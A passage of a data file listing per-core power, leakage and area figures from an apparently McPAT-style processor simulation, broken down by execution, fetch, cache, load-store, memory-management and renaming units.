'Execution Unit/Complex ALUs/Runtime Dynamic': 0.49876,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.04088,
'Execution Unit/Floating Point Units/Runtime Dynamic': 1.20185,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.79446,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.37572,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.824142,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.99432,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.472393,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.538892,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 9.48411,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.385567,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0287998,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.349168,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.212992,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.734735,
'Execution Unit/Register Files/Runtime Dynamic': 0.241792,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.947003,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.95475,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 7.43036,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00235165,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00235165,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00203907,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000784317,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00305965,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00980202,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0228766,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.204755,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.444925,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.69544,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.3778,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0586135,
'L2/Runtime Dynamic': 0.0158758,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.44237,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.51837,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.168402,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.168402,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.24084,
'Load Store Unit/Runtime Dynamic': 3.51728,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.415251,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.830503,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.147374,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.148235,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0726554,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.813275,
'Memory Management Unit/Runtime Dynamic': 0.220891,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 31.1273,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.34516,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0568109,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.383553,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.78552,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 14.3477,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.373603,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.496133,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 2.02754,
'Execution Unit/Floating Point Units/Runtime Dynamic': 1.19598,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.785943,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.36097,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.821415,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.96833,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.466021,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.554356,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 9.44418,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.383045,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0284911,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.345492,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.210709,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.728537,
'Execution Unit/Register Files/Runtime Dynamic': 0.2392,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.937202,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.97805,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 7.43205,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00156874,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00156874,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00136314,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000525927,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00302685,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00752748,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0151564,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.20256,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.469091,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.687984,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.38232,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.059326,
'L2/Runtime Dynamic': 0.0161996,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.51581,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.55373,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.170778,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.170778,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.32554,
'Load Store Unit/Runtime Dynamic': 3.56673,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.42111,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.84222,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.149453,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.150322,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0765629,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.816869,
'Memory Management Unit/Runtime Dynamic': 0.226885,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 31.1764,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.33636,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0562696,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.381776,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.7744,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 14.3986,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.355985,
